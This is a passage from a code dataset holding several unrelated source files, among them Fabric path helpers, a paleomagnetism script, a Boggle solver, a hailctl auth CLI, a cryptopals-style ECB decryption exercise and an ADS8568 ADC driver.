`ensure_exists` flag to work correctly).\n :param ensure_exists: ensures that the path exists.\n\n \"\"\"\n path = local_path(env.get('working_path', 'den'))\n if sub_path:\n path = join_local_paths(path, sub_path)\n if ensure_exists and not os.path.exists(path):\n os.makedirs(path)\n\n if file_name:\n return join_local_paths(path, file_name)\n else:\n return path\n\n\ndef local_config_file_options(service_name, name_prefix=None,\n extension='.conf'):\n \"\"\"\n Local names of a service config file with fallbacks.\n\n Will return the name as well as optional fallback names for environment\n specific configuration.\n\n :param service_name: name of the service the configuration files is for.\n :param name_prefix: an optional prefix for the configuration file name.\n :param extension: file extension of config files.\n\n Names of config files follow the following convention:\n\n [\n FABFILE_PATH/conf/SERVICE_NAME/ENVIRONMENT.EXTENSION,\n FABFILE_PATH/conf/SERVICE_NAME.EXTENSION,\n ]\n\n or with a prefix:\n\n [\n FABFILE_PATH/conf/SERVICE_NAME/PREFIX-ENVIRONMENT.EXTENSION\n FABFILE_PATH/conf/SERVICE_NAME/ENVIRONMENT.EXTENSION,\n FABFILE_PATH/conf/PREFIX-SERVICE_NAME.EXTENSION,\n FABFILE_PATH/conf/SERVICE_NAME.EXTENSION,\n ]\n\n \"\"\"\n require('deploy_env')\n path_elements = {\n 'name': service_name,\n 'prefix': name_prefix,\n 'env': env.deploy_env,\n 'ext': extension,\n }\n if name_prefix:\n return [\n local_path('conf/%(name)s/%(prefix)s-%(env)s%(ext)s' % path_elements),\n local_path('conf/%(name)s/%(env)s%(ext)s' % path_elements),\n local_path('conf/%(prefix)s-%(name)s%(ext)s' % path_elements),\n local_path('conf/%(name)s%(ext)s' % path_elements),\n ]\n else:\n return [\n local_path('conf/%(name)s/%(env)s%(ext)s' % path_elements),\n local_path('conf/%(name)s%(ext)s' % path_elements),\n ]\n\n\ndef local_config_file(service_name, name_prefix=None, abort_if_not_found=True,\n extension='.conf'):\n \"\"\"\n Determine the correct local config file, this method will try several\n options as resolved by `local_config_file_options` and return the path to\n the first matching file that exists on disk.\n\n :param service_name: name of the service the configuration files is for.\n :param name_prefix: an optional prefix for the configuration file name.\n :param abort_if_not_found: abort fabric operation if the requested file\n could not be found.\n :param extension: file extension of config files.\n\n \"\"\"\n file_options = local_config_file_options(service_name, name_prefix, extension)\n for file_option in file_options:\n if os.path.exists(file_option):\n return file_option\n if abort_if_not_found:\n abort(\"\"\"\nNot able to find a configuration file for service \"%s\".\n\nSearched path(s): %s\n\"\"\" % (service_name, file_options))\n\n\n## Context managers #########\n\ndef cd_deploy(*args, **kwargs):\n \"\"\"\n Context manager to change to the deploy path.\n\n :sub_path: A path below the package path.\n\n \"\"\"\n return cd(deploy_path(*args, **kwargs))\n\n\ndef cd_package(*args, **kwargs):\n \"\"\"\n Context manager to change to a package path.\n\n :revision: Name of revision; default is *env.revision* or *current*.\n :sub_path: A path within the package.\n\n \"\"\"\n return cd(package_path(*args, **kwargs))\n","sub_path":"denim/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"332664916","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom builtins import input\nfrom builtins import range\nimport numpy\nimport sys\nimport pmagpy.pmag as pmag\n\ndef main():\n \"\"\"\n NAME\n di_geo.py\n\n DESCRIPTION\n rotates specimen coordinate dec, inc data to geographic\n coordinates using the azimuth and plunge of the X direction\n\n INPUT FORMAT\n declination inclination azimuth plunge\n\n SYNTAX\n di_geo.py [-h][-i][-f FILE] [< filename ]\n\n OPTIONS\n -h prints help message and quits\n -i for interactive data entry\n -f FILE command line entry of file name\n -F OFILE, specify output file, default is standard output\n OUTPUT:\n declination inclination\n \"\"\"\n if '-h' in sys.argv:\n print(main.__doc__)\n sys.exit()\n if '-F' in sys.argv:\n ind=sys.argv.index('-F')\n ofile=sys.argv[ind+1]\n out=open(ofile,'w')\n print(ofile, ' opened for output')\n else: ofile=\"\"\n\n if '-i' in sys.argv: # interactive flag\n while 1:\n try:\n Dec=float(input(\"Declination: to quit \"))\n except EOFError:\n print(\"\\n Good-bye\\n\")\n sys.exit()\n Inc=float(input(\"Inclination: \"))\n Az=float(input(\"Azimuth: \"))\n Pl=float(input(\"Plunge: \"))\n print('%7.1f %7.1f'%(pmag.dogeo(Dec,Inc,Az,Pl)))\n elif '-f' in sys.argv:\n ind=sys.argv.index('-f')\n file=sys.argv[ind+1]\n data=numpy.loadtxt(file)\n else:\n data=numpy.loadtxt(sys.stdin,dtype=numpy.float) # read in the data from the datafile\n D,I=pmag.dogeo_V(data)\n for k in range(len(D)):\n if ofile==\"\":\n print('%7.1f %7.1f'%(D[k],I[k]))\n else:\n out.write('%7.1f %7.1f\\n'%(D[k],I[k]))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"programs/di_geo.py","file_name":"di_geo.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"20414824","text":"from .version import version\n\n_CONTEXT_HIGH_PRIORITY = \"0Level\"\n_CONTEXT_INLINESCRIPT = \"InlineScript\"\n_CONTEXT_VOCABULARY = \"Vocabulary\"\n_CONTEXT_NAMES = \"Names\"\n_CONTEXT_CHOICE = \"Choice\"\n_CONTEXT_DIALOGUE = \"Dialogue\"\n_CONTEXT_DESCRIPTION = \"Description\"\n_CONTEXT_SYSTEM = \"System\"\n_CONTEXT_MV = \"MV\"\n_CONTEXT_V2 = \"RPGMakerV2\"\n_CONTEXT_GAME_TITLE = \"GameTitle\"\n_CONTEXT_NOT_FOUND = \"OtherText\"\n\ncontextNames = [_CONTEXT_HIGH_PRIORITY, _CONTEXT_NOT_FOUND, _CONTEXT_GAME_TITLE, _CONTEXT_V2, _CONTEXT_MV, _CONTEXT_SYSTEM,\n _CONTEXT_DESCRIPTION, _CONTEXT_DIALOGUE, _CONTEXT_CHOICE, _CONTEXT_NAMES, _CONTEXT_VOCABULARY, _CONTEXT_INLINESCRIPT]\n\nclass TranslationDictionary (object):\n def __init__(self, dictDict):\n self.dicts = dictDict\n\n def addMachineTranslation (self, context, originalSentence, translatedSentence):\n contextedDict = self.dicts[context]\n contextedDict[originalSentence] = translatedSentence + machineTranslatorTag()\n\n def addGoogleTranslation (self, context, originalSentence, translatedSentence):\n contextedDict = self.dicts[context]\n contextedDict[originalSentence] = translatedSentence\n\n def hasTranslation (self, context, originalSentence):\n # Checks context dictionary for originalSentence, returns boolean regarding it being found\n if originalSentence in self.dicts['0Level']:\n trans = self.dicts['0Level'][originalSentence]\n if not isMachineTranslation(trans) or isCurrentMachineTranslation(trans):\n return True\n if originalSentence in self.dicts[context]:\n trans = self.dicts[context][originalSentence]\n if not isMachineTranslation(trans) or isCurrentMachineTranslation(trans):\n return True\n return False\n\n def getTranslation (self, context, originalSentence):\n # Returns dictionary translation for originalSentence in context\n if originalSentence in self.dicts['0Level']:\n trans = self.dicts['0Level'][originalSentence]\n else:\n trans = self.dicts[context][originalSentence]\n if not isMachineTranslation(trans):\n return trans\n if isCurrentMachineTranslation(trans):\n index = trans.find(machineTranslatorTag())\n return trans[:index]\n\ndef machineTranslatorTag ():\n # Returns a full tag to be added to machine translated dictionary entries\n return \"*MechaTranslator V\" + version + \"*\"\n\ndef isMachineTranslation (text):\n # Returns boolean regarding text being an machine translated entry\n return text.find(\"*MechaTranslator V\") != -1\n\ndef isCurrentMachineTranslation (text):\n # Returns boolean regarding text being an up to date machine translated entry\n return text.find(machineTranslatorTag()) != -1","sub_path":"lib/classes/TranslationDictionary.py","file_name":"TranslationDictionary.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56828292","text":"import textwrap\n\n\ndef get_test_input() -> str:\n return textwrap.dedent(\"\"\"\\\n forward 5\n down 5\n forward 8\n up 3\n down 8\n forward 2\"\"\")\n\n\ndef read_input(day_number, test=False):\n if test:\n return parse_input(get_test_input())\n else:\n filename = 'input/day{}.txt'.format(day_number)\n with open(filename, 'r') as file:\n return parse_input(file.read())\n\n\ndef parse_input(s: str):\n data = []\n for line in s.splitlines():\n data.append(line.split())\n return data\n\n\ndef part_1(data):\n x = 0\n z = 0\n for direction, dist in data:\n if direction == 'forward':\n x += int(dist)\n elif direction == 'up':\n z -= int(dist)\n if z < 0:\n print(\"unexpected\")\n elif direction == 'down':\n z += int(dist)\n\n print(f'Part 1: {x*z}')\n\n\ndef part_2(data):\n x = 0\n depth = 0\n aim = 0\n for direction, dist in data:\n if direction == 'forward':\n x += int(dist)\n depth += aim*int(dist)\n elif direction == 'up':\n aim -= int(dist)\n elif direction == 'down':\n aim += int(dist)\n\n print(f'Part 2: {x*depth}')\n\n\ndef main():\n data = read_input(day_number=2, test=False)\n part_1(data)\n part_2(data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2021/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"306201724","text":"import re\nimport os\nimport requests\nimport json\nfrom totalimpactwebapp import product\nfrom totalimpactwebapp import heading_product\nfrom flask import g\n\n\n\n\n\ndef prep(products_dict, include_headings=False):\n\n prepped_products = []\n\n for product_dict in products_dict:\n\n try:\n prepped_products.append(product.prep_product(product_dict))\n except product.GenreDeprecatedError:\n pass\n\n if include_headings:\n prepped_products += make_heading_products(prepped_products)\n #prepped_products = remove_account_products(prepped_products)\n\n return prepped_products\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nCategory Heading stuff\n\"\"\"\n\ndef make_heading_products(products):\n\n categories = categorize_products(products)\n\n heading_products_list = []\n\n for category_key, category_products in categories.iteritems():\n\n my_heading_product = heading_product.make_for_category(\n category_key[0], # genre\n category_key[1], # account\n category_products\n )\n\n heading_products_list.append(my_heading_product)\n\n return heading_products_list\n\n\n\ndef remove_account_products(products):\n ret = []\n for product in products:\n\n try:\n if not product['biblio']['is_account']:\n ret.append(product)\n except KeyError:\n ret.append(product)\n\n return ret\n\n\ndef categorize_products(products):\n categories = {}\n for product in products:\n genre = product[\"biblio\"][\"genre\"]\n try:\n account = product[\"biblio\"][\"account\"].lower()\n except KeyError:\n account = None\n\n\n categories.setdefault((genre, account), []).append(product)\n\n return categories\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nduplicates stuff\n\"\"\"\n\n\n\ndef get_duplicates_list_from_tiids(tiids):\n if not tiids:\n return []\n\n query = u\"{core_api_root}/v1/products/duplicates?api_admin_key={api_admin_key}\".format(\n core_api_root=g.api_root,\n api_admin_key=os.getenv(\"API_ADMIN_KEY\")\n )\n\n r = requests.post(query,\n data=json.dumps({\n \"tiids\": tiids\n }),\n headers={'Content-type': 'application/json', 'Accept': 'application/json'})\n\n return r.json()[\"duplicates_list\"]\n\n\n\n\n\n","sub_path":"totalimpactwebapp/products_list.py","file_name":"products_list.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"413779541","text":"\n\n#calss header\nclass _HEAL():\n\tdef __init__(self,): \n\t\tself.name = \"HEAL\"\n\t\tself.definitions = [u'to make or become well again, especially after a cut or other injury: ', u'If a bad situation or painful emotion heals, it ends or improves, and if something heals it, it makes it end or improve: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_heal.py","file_name":"_heal.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"95377499","text":"import argparse\nimport logging as logger\nimport os.path\nimport sys\n\nfrom inspect import getsourcefile\n\ncurrent_path = os.path.abspath(getsourcefile(lambda: 0))\ncurrent_dir = os.path.dirname(current_path)\nparent_dir = current_dir[:current_dir.rfind(os.path.sep)]\n\nsys.path.insert(0, parent_dir)\n\nfrom lib.trie_tree import TrieTree\nfrom lib.word_search import Boggle\nfrom lib.data_logging import data_logging\n\n\ndef load_dictionary(tree, filepath):\n \"\"\"\n Loads a dictionary file into Boggle object's word list\n :param: tree: prefix tree object\n :param name: Path to the dictionary file\n :return: None\n \"\"\"\n try:\n with open(filepath) as f:\n for line in f:\n word = line.rstrip().upper()\n tree.insert_word(word)\n except IOError:\n raise Exception('Please enter a valid filename.')\n\n\ndef main(size, filepath):\n boggle = Boggle(size=int(size))\n tree = TrieTree()\n load_dictionary(tree, filepath)\n found = set()\n boggle.find_words(tree, found)\n for word in sorted(found):\n logger.info(word)\n logger.info(boggle)\n\n\nif __name__ == '__main__':\n default_dict_path = os.path.join(parent_dir, 'conf', 'words.txt')\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', \"--size\", type=int, default=4,\n action='store', help=\"Board size\")\n parser.add_argument('-p', \"--filepath\", default=default_dict_path,\n action='store', help=\"Path of words.txt file\")\n\n args = parser.parse_args()\n data_logging()\n main(args.size, args.filepath)\n","sub_path":"word_puzzle/workflow/puzzle_solver.py","file_name":"puzzle_solver.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"392044614","text":"import sys\nimport argparse\n\nfrom . import login\nfrom . import logout\nfrom . import auth_list\nfrom . import copy_paste_login\n\n\ndef parser():\n main_parser = argparse.ArgumentParser(\n prog='hailctl auth',\n description='Manage Hail credentials.')\n subparsers = main_parser.add_subparsers()\n\n login_parser = subparsers.add_parser(\n 'login',\n help='Obtain Hail credentials.',\n description='Obtain Hail credentials.')\n copy_paste_login_parser = subparsers.add_parser(\n 'copy-paste-login',\n help='Obtain Hail credentials with a copy paste token.',\n description='Obtain Hail credentials with a copy paste token.')\n logout_parser = subparsers.add_parser(\n 'logout',\n help='Revoke Hail credentials.',\n description='Revoke Hail credentials.')\n list_parser = subparsers.add_parser(\n 'list',\n help='List Hail credentials.',\n description='List Hail credentials.')\n\n login_parser.set_defaults(module='login')\n login.init_parser(login_parser)\n\n copy_paste_login_parser.set_defaults(module='copy-paste-login')\n copy_paste_login.init_parser(copy_paste_login_parser)\n\n logout_parser.set_defaults(module='logout')\n logout.init_parser(logout_parser)\n\n list_parser.set_defaults(module='list')\n auth_list.init_parser(list_parser)\n\n return main_parser\n\n\ndef main(args):\n if not args:\n parser().print_help()\n sys.exit(0)\n jmp = {\n 'login': login,\n 'copy-paste-login': copy_paste_login,\n 'logout': logout,\n 'list': auth_list,\n }\n\n args, pass_through_args = parser().parse_known_args(args=args)\n jmp[args.module].main(args, pass_through_args)\n","sub_path":"hail/python/hailtop/hailctl/auth/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504107851","text":"\"\"\"\n17.\t Altere o programa de cálculo dos números primos, informando,\n caso o número não seja primo, por quais número ele é divisível.\n\"\"\"\nnum = int(input('Digite um numero: '))\ntot = 0\nfor c in range(1,num+1):\n if num % c == 0:\n tot+=1\nprint(f'Numero {num} foi divisível {tot} vezes.')\nif tot == 2:\n print('E por isso ele é PRIMO!')\nelse:\n for i in range(1, num + 1):\n if num % i == 0:\n print(f' {i}', end=' ')\n print('\\nE por isso ele NAO É PRIMO!')","sub_path":"Lista03/ex017.py","file_name":"ex017.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"47264016","text":"def dfs(graph, start_node, visit = None):\n if visit is None:\n visit = list()\n visit.append(start_node)\n for next in graph[start_node]:\n if next not in visit:\n dfs(graph, next, visit)\n return visit\n\ndef searchN(node, value):\n if value not in node:\n node.append(value)\n\ndef main():\n n, m = map(int, input().split())\n node = list(input().split())\n node_dic = {}\n for i in range(n):\n node_dic[node[i]] = []\n for _ in range(m):\n input_node = list(input().split())\n searchN(node_dic[input_node[0]], input_node[1])\n searchN(node_dic[input_node[1]], input_node[0])\n target = input()\n for i in range(len(node_dic)):\n node_dic[node[i]].sort()\n print(*dfs(node_dic, target))\n\nif __name__ == \"__main__\":\n main()","sub_path":"7주차_코테 (dfs)/prac3.py","file_name":"prac3.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"490013940","text":"import itertools\nimport collections\n\n\ndef apriori(data, support_ratio):\n \"\"\"\n Given a list of sets (data), discover subsets that occurs at a minimum percentage (support_ratio).\n Example:\n data: [{1, 2, 3, 4}, {1, 2, 3}, {1, 2}, {2, 3, 4}, {2, 3}, {3, 4}, {2, 4}]\n support_ratio: 0.42\n Returns:\n {(1,): 0.42857142857142855,\n (1, 2): 0.42857142857142855,\n (2,): 0.8571428571428571,\n (2, 3): 0.5714285714285714,\n (2, 4): 0.42857142857142855,\n (3,): 0.7142857142857143,\n (3, 4): 0.42857142857142855,\n (4,): 0.5714285714285714}\n \"\"\"\n \n # get number of itemsets\n total_itemsets = len(data)\n\n # control size of subsets\n length = 0\n longest_itemset = max([len(itemset) for itemset in data])\n\n # initialize control of accepted subsets\n support = {}\n\n # initialize control of rejected subsets\n discards = []\n\n # stopping criteria - if a iteration is rejected completely, it's time to stop\n foundit = True\n\n while foundit and length <= longest_itemset:\n # increment size of subsets\n length += 1\n\n # generate subsets and remove not supported combinations\n items = set([combination\n for itemset in data\n for combination in itertools.combinations(itemset, length)\n if combination not in discards])\n\n # count subsets in data\n s = collections.Counter([item\n for item in items\n for itemset in data\n if itemset.issuperset(item)])\n\n # add subsets that have support and discard those don't have\n foundit = False\n for key, value in s.items():\n ratio = value / total_itemsets\n if ratio >= support_ratio:\n foundit = True\n support[key] = ratio\n else:\n discards += key\n\n return support\n","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"269506960","text":"magicians = ['Alice', 'Markus', 'Salazar']\n\ndef show_magicians(mag_list):\n \"\"\"Выводим список фокусников\"\"\"\n for maician in mag_list:\n print(maician)\n\n\ndef make_great(mag_list):\n \"\"\"Делаем фокусника вновь великим\"\"\"\n inner_list=[]\n for i in range(len(mag_list)):\n inner_list.append(mag_list[i] + ' великий!')\n return inner_list\n\n\n\n\nshow_magicians(make_great(magicians))\nshow_magicians(magicians)","sub_path":"Lesson_9/Homework/magicians.py","file_name":"magicians.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"573647418","text":"import aes\nimport base64\nimport random\nfrom itertools import count\n\n\ndef encryption_oracle(key, rand, text, postfix):\n\n cipher = aes.ecb(key=key)\n postfix = base64.b64decode(postfix)\n cipherText = cipher.encrypt(rand + text + postfix)\n return cipherText\n\n\ndef random_bytes(n):\n return b''.join([bytes([random.randint(0, 255)]) for i in range(n)])\n\n\ndef overflow(i, postfix):\n return encryption_oracle(key, rand, b'a'*i, postfix)\n\n\ndef extract_suffix(blocks):\n for i, block in enumerate(blocks):\n if block == blocks[i-1]:\n return blocks[i+1:]\n\n\ndef iterate_bytes(block):\n if block is not None:\n for letter in range(1, 255):\n yield block + bytes([letter])\n\n\ndef find_byte(block, pad, n=16):\n cipher = encryptionOracle(pad, key)\n for tries in iterate_bytes(block):\n candidate = encryptionOracle(tries, key)[:n]\n if candidate == cipher[:n]:\n return tries\n\n\ndef decrypt_shit(max_lenght):\n solution = []\n for k in count():\n if k > max_lenght:\n break\n blocks = b'a'*(k-1)\n pad = blocks\n for i in range(len(blocks)):\n if find_byte(blocks, pad) is not None:\n try:\n blocks = find_byte(blocks, pad, k)\n blocks = blocks[1:]\n solution.append(blocks)\n pad = pad[1:]\n except:\n pass\n print(solution)\n\n\nkey = random_bytes(16)\nn = random.randint(1, 70)\nrand = random_bytes(n)\n\nif __name__ == '__main__':\n postfix = ('Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9'\n 'wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ'\n '2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHR'\n 'vIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c'\n '3QgZHJvdmUgYnkK')\n for i in count():\n buffered = overflow(i, postfix)\n blocks = [buffered[j: j+16] for j in range(0, len(buffered), 16)]\n if extract_suffix(blocks) is not None:\n cipher = b''.join(extract_suffix(blocks))\n break\n","sub_path":"ch14.py","file_name":"ch14.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"310013482","text":"# imports\ntry:\n from .modules import *\nexcept:\n from modules import *\n\ndatabase = \"data\"\n# Global variables\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\nmonth_count = len(months)\nlabels, rainfall = open_file(database)\nif not labels:\n labels =[]\nif not rainfall:\n rainfall = [[] for i in range(month_count)]\n\n\n# Functions\n\n\ndef main():\n\n while True:\n print(\"1. Input data\")\n if rainfall != [[] for i in range(month_count)]:\n print(\"2. Output Data\")\n print(\"3. Show graph\")\n print(\"0. Exit\")\n option = input(\">>\")\n if option == \"0\":\n close_and_save(database, labels, rainfall)\n elif option == \"1\":\n label_name = input(\"Label: \")\n labels.append(label_name)\n get_month_rainfall(months, rainfall, \"Rainfall\")\n elif option == \"2\":\n c = 0\n for i in labels:\n print(c, i)\n c += 1\n l = None\n while l not in range(len(labels)):\n l = int(input(\">\"))\n avrg, above_avrg = get_avrgs(rainfall, l)\n print(get_readable(months, rainfall, \"Rainfall\", l))\n print(\"There were %s months above the avrg of %s\" % (str(above_avrg), str(round(avrg, 2))))\n elif option == \"3\":\n c = 0\n for i in labels:\n print(c, i)\n c += 1\n l = None\n while l not in range(len(labels)):\n l = int(input(\">\"))\n draw_graph(months, [i[l] for i in rainfall])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"rainStore.py","file_name":"rainStore.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"574371680","text":"# -*- coding: utf-8 -*-\nimport time\nfrom mix.driver.core.bus.axi4_lite_bus import AXI4LiteBus\n\n__author__ = 'jionghao.huang@SmartGiant'\n__version__ = '0.1'\n\n\nclass MIXADS8568SGDef:\n MODULE_STATUS = 0x10 # 1bit\n ADS8568_SEL_B = 0x11 # 1bit\n ADS8568_SEL_CD = 0x12 # 1bit\n ADC_SPI_RATE = 0x14 # 32bit\n SPI_NORMAL_DATA = 0x18 # 32bit\n DATA_LEN = 4\n ADC_CHANNEL_EN = 0x20 # 4bit\n CHANNEL_A_DATA = 0x24 # 32bit\n CHANNEL_B_DATA = 0x28 # 32bit\n CHANNEL_C_DATA = 0x2C # 32bit\n CHANNEL_D_DATA = 0x30 # 32bit\n\n STATUS = {'enable': 0x01, 'disable': 0x00}\n CHANNEL_PAIR = {'A': CHANNEL_A_DATA, 'B': CHANNEL_B_DATA, 'C': CHANNEL_C_DATA, 'D': CHANNEL_D_DATA}\n\n # Config register mask.\n INTERNAL_VREF_EN = 0x00001000\n INTERNAL_VREF_DIS = 0x00000000\n WR_RD_CONFIG_REG = 0xC0000000\n # Hardware mode related register.\n # Bit 30\n READ_EN_NORMAL = 0x00000000\n READ_EN_TWO_ACCESSES = 0x40000000\n # Bit 29\n CLKSEL_NORMAL = 0x00000000\n CLKSEL_EXTERNAL = 0x20000000\n # Bit 27\n BUSY_MODE = 0x00000000\n INTERRUPT_MODE = 0x08000000\n # Bit 26\n ACTIVE_HIGH = 0x00000000\n ACTIVE_LOW = 0x04000000\n # Bit 22\n PD_B_NORMAL = 0x00000000\n PD_B_POWER_DOWN = 0x00400000\n # Bit 20\n PD_C_NORMAL = 0x00000000\n PD_C_POWER_DOWN = 0x00100000\n # Bit 18\n PD_D_NORMAL = 0x00000000\n PD_D_POWER_DOWN = 0x00040000\n # Bit 13\n VREF_2500_MV = 0x00000000\n VREF_3000_MV = 0x00002000\n\n POSITIVE_FULL_SCALE = 0x7FFF\n\n DEV_FUNC_MODE = {'sw': 0, 'hw': 1}\n CHANNEL = {1: 'A', 2: 'A', 3: 'B', 4: 'B', 5: 'C', 6: 'C', 7: 'D', 8: 'D'}\n HW_ABSOLUTE_VOLT_RANGE = {'4VREF': 0, '2VREF': 1}\n SW_ABSOLUTE_VOLT_RANGE = {\n 'A': {'4VREF': 0, '2VREF': 0x01000000},\n 'B': {'4VREF': 0, '2VREF': 0x00800000},\n 'C': {'4VREF': 0, '2VREF': 0x00200000},\n 'D': {'4VREF': 0, '2VREF': 0x00080000}\n }\n MAX_VREF_OUTPUT_RANGE = {2.5: VREF_2500_MV, 3: VREF_3000_MV}\n\n CH_MIN = 1\n CH_MAX = 8\n\n\nclass MIXADS8568SG(object):\n '''\n MIXADS8568SG is the ipcore of chip ads8568.\n\n '''\n\n def __init__(self, axi4_bus, convst_a=None, convst_b=None, convst_c=None, convst_d=None,\n busy=None, xclk=None, hw_sw_sel=None, ref_sel=None, stby=None, reset=None,\n cs=None, refbuf_en=None, asleep_sel=None, ser_sel=None, sel_cd=None, sel_b=None):\n self.axi4_bus = axi4_bus\n self.convst_a = convst_a\n self.convst_b = convst_b\n self.convst_c = convst_c\n self.convst_d = convst_d\n self.busy = busy\n self.xclk = xclk\n self.hw_sw_sel = hw_sw_sel\n self.ref_sel = ref_sel\n self.stby = stby\n self.reset = reset\n self.cs = cs\n self.refbuf_en = refbuf_en\n self.asleep_sel = asleep_sel\n self.ser_sel = ser_sel\n self.sel_cd = sel_cd\n self.sel_b = sel_b\n\n self.dev_func_mode = 'hw'\n self.max_vref_range = 2.5\n self.input_volt_range = 4 * self.max_vref_range\n self.current_config_data = 0x000003FF\n\n def ctrl_dev(self, status):\n '''\n MIXADS8568SG control device.\n\n Args:\n status: string, ['enable', 'disable'], device status.\n\n Examples:\n mixads8568sg.ctrl_dev('enable')\n\n '''\n assert status in MIXADS8568SGDef.STATUS\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.MODULE_STATUS, [MIXADS8568SGDef.STATUS[status]])\n\n def write_config_register(self, wr_data):\n '''\n MIXADS8568SG wirte config register.(0nly effective in sw mode.)\n\n Args:\n wr_data: int, [0x0 ~ 0xFFFFFFFF], data to write.\n\n Examples:\n mixads8568sg.write_config_register(0xC00003FF)\n\n '''\n assert isinstance(wr_data, int)\n assert 0x00000000 <= wr_data <= 0xFFFFFFFF\n\n self.axi4_bus.write_32bit_inc(MIXADS8568SGDef.SPI_NORMAL_DATA, [wr_data])\n\n def read_config_register(self):\n '''\n MIXADS8568SG read config register.(0nly effective in sw mode.)\n\n Examples:\n mixads8568sg.read_config_register()\n\n '''\n # Need debug.\n wr_data = MIXADS8568SGDef.WR_RD_CONFIG_REG | self.current_config_data\n self.write_config_register(wr_data)\n self.start_conv('A')\n # time.sleep(0.001)\n rd_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.SPI_NORMAL_DATA, MIXADS8568SGDef.DATA_LEN)\n\n return rd_data[0]\n\n def sel_b_ch(self, status):\n '''\n MIXADS8568SG select channel pair B.\n\n Args:\n status: string, ['enable', 'disable'], channel status.\n\n Examples:\n mixads8568sg.sel_b_ch('enable')\n\n '''\n assert status in MIXADS8568SGDef.STATUS\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.ADS8568_SEL_B, [MIXADS8568SGDef.STATUS[status]])\n\n def sel_cd_ch(self, status):\n '''\n MIXADS8568SG select channel pair C and D.\n\n Args:\n status: string, ['enable', 'disable'], channel status.\n\n Examples:\n mixads8568sg.sel_cd_ch('enable')\n\n '''\n assert status in MIXADS8568SGDef.STATUS\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.ADS8568_SEL_CD, [MIXADS8568SGDef.STATUS[status]])\n\n def set_spi_speed(self, speed):\n '''\n MIXADS8568SG set spi bus clock speed.\n\n Args:\n speed: int, [1 ~ 20000000], unit Hz, 1000000 means 1000000Hz.\n\n Examples:\n mixads8568sg.set_spi_speed(10000000)\n\n '''\n assert 1 <= speed <= 20000000\n\n wr_data = (pow(2, 32) * 8 * speed) / 1000000000\n self.axi4_bus.write_32bit_inc(MIXADS8568SGDef.ADS8568_SEL_CD, [wr_data])\n\n def adc_ch_pair_en(self, count):\n '''\n MIXADS8568SG set spi bus clock speed.\n\n Args:\n count: int, [1 ~ 4], unit Hz, 1000000 means 1000000Hz.\n\n Examples:\n mixads8568sg.adc_ch_pair_en(4)\n\n '''\n assert 1 <= count <= 4\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.ADC_CHANNEL_EN, [count])\n\n def read_single_ch_data(self, ch_pair):\n '''\n MIXADS8568SG set spi bus clock speed.\n\n Args:\n ch_pair: int, ['A', 'B', 'C', 'D'], channel pair.\n\n Returns:\n rd_data, int.\n\n Examples:\n mixads8568sg.read_single_ch_data('A')\n\n '''\n assert ch_pair in MIXADS8568SGDef.CHANNEL_PAIR\n\n rd_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_PAIR[ch_pair], MIXADS8568SGDef.DATA_LEN)\n return rd_data[0]\n\n def read_all_ch_data(self):\n '''\n MIXADS8568SG read all channels data.\n\n 